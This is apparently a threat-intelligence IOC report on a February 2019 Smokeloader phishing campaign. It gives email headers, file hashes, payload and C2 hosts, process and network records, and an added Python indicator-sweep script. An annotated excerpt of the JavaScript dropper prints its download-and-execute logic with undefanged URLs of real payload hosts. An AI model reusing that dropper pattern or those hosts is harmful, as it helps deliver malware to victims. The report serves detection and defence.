VRad

#smokeloader_270219

Feb 27th, 2019
#IOC #OptiData #VR #pony #smokeloader #WSH #LZH

https://pastebin.com/Z7zq0YkW

previous contact:
https://pastebin.com/b8PkhMyN
https://pastebin.com/hkskwKvc
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH > GET lico.exe from one of 2 URLs > AppData\Roaming\Microsoft\Windows\Templates\<random 4-7 digit number>.exe
(LZH is an uncommon archive format; a mail filter that does not unpack it never sees the .js inside. The drop name is produced by the script's Math.random() expression in dropper_script below, so a fixed six-character wildcard is too narrow; 126531.exe was the name in this run.)

email_headers
--------------
Received: from ds196.mirohost.net (ds196.mirohost.net [89.184.70.56])
Received: from [185.143.147.204] (port=50240 helo=nat-204.utels.ua) by ds196.mirohost.net
From: Мария Яковенко <buhg@martgroup.com.ua>   (display name: Maria Yakovenko)
Subject: рахунки Яковенко М.М.   (Ukrainian: "invoices Yakovenko M.M.")
To: "user00" <user00@victim0.com>
Reply-To: Мария Яковенко <buhg@martgroup.com.ua>
Date: Wed, 27 Feb 2019 11:30:37 +0200

files
--------------
SHA-256 d388d26267051b6036ec22035883c0d849e7495919b37a09c3d48a4af0094e18
File name По работе за февраль.lzh  (Russian: "On work for February.lzh") [LHarc 1.x/ARX archive data [lh0]]
File size 354.38 KB

SHA-256 11682833800a3ff5e5984de31ecd2f46c53341bc813fbaa9b53af74548d4a03b
File name Распределение завхозов.ods  (Russian: "Distribution of supply managers.ods") [OpenDocument Spreadsheet]
File size 19.1 KB

SHA-256 daa2443a7ff973346246d3d92260b8100bdca5054c179688d4df3d164edf4b6a
File name Pax. 18-201 - 27.02.2019p..js  ("Рах." is the Ukrainian abbreviation for invoice, i.e. "Invoice 18-201 - 27.02.2019") [ASCII text, with very long lines]
File size 335.18 KB

SHA-256 77b488a1904fb2b143e62dd5eedffd487c9e2e451a78bd921b0f4295adafbe7b
File name lico.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 568.5 KB

activity
**************

dropper_script (excerpt; the HTTP and Stream objects and the branch condition before "else" are created in lines not reproduced here):
wsh = new ActiveXObject("wscript.shell");   // WScript.Shell COM object
path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
        // SpecialFolders("templates") = %APPDATA%\Microsoft\Windows\Templates;
        // (Math.random()*999999)+9999|0 is an integer in [9999, 1009997], so the name has 4 to 7 digits
HTTP.Open("GET", "http://pomulaniop.icu/iman/lico.exe", false);   // synchronous GET, first host
else
HTTP.Open("GET", "http://umileniumkk.ru/iman/lico.exe", false);   // alternate host (selection condition not in the excerpt)
Stream.SaveToFile(path, 2); Stream.Close(); wsh.exec(path); } }   // 2 = adSaveCreateOverWrite; then run the dropped exe

AppData\Roaming\Microsoft\Windows\Templates\<random 4-7 digit number>.exe (observed: 126531.exe)

PL_SRC
pomulaniop{.} icu/iman/lico.exe
umileniumkk{.} ru/iman/lico.exe
mileniumkk{.} ru/iman/lico.exe

C2
http://aviatorssm{.} bit/
(.bit is a Namecoin blockchain TLD that does not exist in the public DNS root, so the bot cannot resolve it through normal recursive DNS; DNS queries for *.bit names, or lookups sent to non-corporate resolvers, are themselves a useful detection signal.)

netwrk
--------------
89.223.29.17 pomulaniop{.} icu GET /iman/lico.exe HTTP/1.1 Mozilla/4.0

comp
--------------
wscript.exe 3084 TCP localhost 49233 89.223.29.17 80 ESTABLISHED

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 18-201 - 27.02.2019p..js"
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\126531.exe

persist
--------------
n/a

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\126531.exe

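IOC sweep, added here as an example and not part of the original paste or the author's tooling: it takes the hashes, payload hosts, C2 host, payload IP and the drop-path pattern from the files / PL_SRC / C2 / netwrk / dropper_script sections above and runs them over a few constructed Sysmon-style events modelled on the proc / comp / drop sections. The Event field names and the sample events are assumptions made for illustration; map them onto whatever your EDR or Sysmon export calls those fields. The drop-path regex is derived from the script's Math.random() expression, so it accepts 4 to 7 digits rather than only the six seen in this run.

```python
"""IOC sweep for the #smokeloader_270219 indicators (added example, not the paste author's code)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators copied from the files / PL_SRC / C2 / netwrk sections of the paste.
KNOWN_SHA256 = {
    "d388d26267051b6036ec22035883c0d849e7495919b37a09c3d48a4af0094e18": "lzh attachment",
    "11682833800a3ff5e5984de31ecd2f46c53341bc813fbaa9b53af74548d4a03b": ".ods file",
    "daa2443a7ff973346246d3d92260b8100bdca5054c179688d4df3d164edf4b6a": ".js dropper",
    "77b488a1904fb2b143e62dd5eedffd487c9e2e451a78bd921b0f4295adafbe7b": "lico.exe",
}
DEFANGED_HOSTS = ["pomulaniop{.} icu", "umileniumkk{.} ru", "mileniumkk{.} ru", "aviatorssm{.} bit"]
KNOWN_IPS = {"89.223.29.17"}


def refang(indicator: str) -> str:
    """Convert the report's defanged 'host{.} tld' notation back into a plain hostname."""
    return re.sub(r"\{\.\}\s*", ".", indicator.strip()).lower()


KNOWN_HOSTS = {refang(h) for h in DEFANGED_HOSTS}

# Drop path from dropper_script: SpecialFolders("templates") + "\" + random + ".exe".
# (Math.random()*999999)+9999|0 is an integer in [9999, 1009997], so the file name
# has 4 to 7 decimal digits (126531.exe in this run); do not hard-code six.
DROP_PATH_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\d{4,7}\.exe$", re.IGNORECASE
)
# wscript.exe launched with a .js script as its argument (proc section).
WSH_JS_RE = re.compile(r"\.js\"?\s*$", re.IGNORECASE)


@dataclass
class Event:
    """Assumed minimal event shape: one process, network or file record."""
    kind: str                 # "process" | "network" | "file"
    image: str = ""           # path of the acting process
    cmdline: str = ""         # full command line (process events)
    sha256: str = ""          # hash of the file or image, if the sensor records it
    dest_ip: str = ""         # remote address (network events)
    dest_host: str = ""       # resolved name / Host header (network events)
    target: str = ""          # file written (file events)


def match_event(ev: Event) -> list[str]:
    """Return the list of indicator matches for one event (empty list if clean)."""
    hits: list[str] = []
    if ev.sha256.lower() in KNOWN_SHA256:
        hits.append(f"known hash ({KNOWN_SHA256[ev.sha256.lower()]})")
    if ev.dest_ip in KNOWN_IPS:
        hits.append(f"known payload IP {ev.dest_ip}")
    if refang(ev.dest_host) in KNOWN_HOSTS:          # accepts defanged or plain input
        hits.append(f"known host {ev.dest_host}")
    if DROP_PATH_RE.search(ev.target):
        hits.append("exe dropped into Templates folder with numeric name")
    if ev.image.lower().endswith("\\wscript.exe") and WSH_JS_RE.search(ev.cmdline):
        hits.append("wscript.exe executing a .js from disk")
    return hits


def sweep(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> reasons for every event that hit at least one indicator."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_event(ev))}


# Constructed sample events modelled on the proc / comp / drop sections above.
SAMPLE_EVENTS = [
    Event(kind="process", image=r"C:\Windows\System32\WScript.exe",
          cmdline=r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 18-201 - 27.02.2019p..js"'),
    Event(kind="network", image=r"C:\Windows\System32\wscript.exe",
          dest_ip="89.223.29.17", dest_host="pomulaniop.icu"),
    Event(kind="file", image=r"C:\Windows\System32\wscript.exe",
          target=r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\126531.exe"),
    Event(kind="process", image=r"C:\Windows\explorer.exe",
          cmdline=r'"C:\Program Files\Example\app.exe"'),   # benign control event, no hit
]

if __name__ == "__main__":
    for idx, reasons in sweep(SAMPLE_EVENTS).items():
        print(f"event {idx} ({SAMPLE_EVENTS[idx].kind}): " + "; ".join(reasons))
```

The hash and host lists are point-in-time: the script's second URL and the third PL_SRC host show the operator rotating download hosts, so the behavioural rules (wscript.exe running a .js, a numeric-named .exe written under the Templates folder) are the ones that will keep matching after the infrastructure changes.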
# # #
https://www.virustotal.com/#/file/d388d26267051b6036ec22035883c0d849e7495919b37a09c3d48a4af0094e18/details
https://www.virustotal.com/#/file/11682833800a3ff5e5984de31ecd2f46c53341bc813fbaa9b53af74548d4a03b/details
https://www.virustotal.com/#/file/daa2443a7ff973346246d3d92260b8100bdca5054c179688d4df3d164edf4b6a/details
https://www.virustotal.com/#/file/77b488a1904fb2b143e62dd5eedffd487c9e2e451a78bd921b0f4295adafbe7b/details
https://analyze.intezer.com/#/analyses/e63b126a-9b53-43dc-a8bd-a8d8112a6f75

VR